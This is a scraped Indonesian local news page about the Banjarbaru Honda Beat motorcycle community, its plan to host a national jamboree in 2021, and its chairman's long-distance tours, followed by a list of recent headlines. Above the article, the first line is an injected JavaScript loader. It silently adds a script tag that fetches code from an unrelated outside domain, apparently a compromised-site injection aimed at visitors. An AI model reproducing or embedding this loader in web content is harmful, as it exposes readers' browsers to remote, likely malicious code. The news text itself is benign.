(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Komunitas

Kombet Banjarbaru Siap Jadi Tuan Rumah Jamnas RBI


KANALKALIMANTAN.COM, BANJARBARU – Jambore Nasional (Jamnas) yang diselenggarakan Republik Beat Indonesia (RBI) bakal dihelat di Kalsel tahun 2021 mendatang.

“Insyallah tahun depan 2021 Banjarbaru menjadi tuan rumah, untuk Jambore Nasional (Jamnas), untuk tempatnya masih kami rundingkan sama anggota yang lain,” ujar Budi Setiawan alias Budy Buday, Ketua Komunitas Motor Beat (Kombet) Banjarbaru kepada Kanalkalimantan.com, Jum’at (7/8/2020) malam.

Sekadar diketahui saja, Komunitas Motor Beat alias Kombet ini sebuah perkumpulan anak motor atau orang yang mengendarai sepeda motor Honda Beat di kota Banjarbaru yang sudah eksis sejak September 2010.

Saat ini jumlah anak motor Kombet sebanyak 60 orang, dua diantaranya perempuan. Togkrongan mereka tiap akhir pekan, kopdar wajib ada di simpang empat Banjarbaru.

Kombet Banjarbaru sendiri menjadi bagian dari Republik Beat Indonesia, paguyuban bikers pengguna Honda Beat seluruh Indonesia. Ada 9 Pengda dengan total klub yang tergabung di dalamnya sebanyak 163 klub motor Beat.

Budy dan Husen saat touring lintas pulau di jembatan kuning, Palu, Sulteng. foto Kombet for kanalkalimantan

Cowok umur 23 tahun ini menceritakan kepada Kanalkalimantan.com, sudah pernah touring lintas antar pulau, dua kali touring ke luar pulau Kalimantan, pada tahun 2017 dan 2019.

“Saya sudah pernah 2 kali touring ke luar pulau kalimantan menggunakan Honda Beat, tahun 2017 ke Palu, Sulawesi Tengah bersama rekan Husen. Tahun 2019 touring ke Garut, Jawa Barat sendirian mewakili komunitas menghadiri acara Jamnas,” bebernya.

Saat perjalanan yang dia tempuh dari Banjarbaru menuju Palu, Sulawesi Tengah, kala itu ia menghabiskan waktu selama 10 hari.

“Alhamdulillah tidak ada kendala saat touring, dari oli, bahan bakar, ban, semuanya aman, cuman satu kali saja ganti oli, pas mau balik dari Palu menuju Banjarbaru,” ceritanya.

Melakukan perjalanan jarak jauh dengan sepeda motor itu sangat menyenenangkan, sembari melepas kepenatan dan  strees. “Dibanding dengan naik mobil, ya walaupun sedikit agak penat tangan, tapi seru,” pungkasnya. (kanalkalimantan.com/wahyu)

Reporter: wahyu
Editor: bie


Al Ghifari

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

11 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

11 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

12 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

12 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

12 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

12 jam ago

This website uses cookies.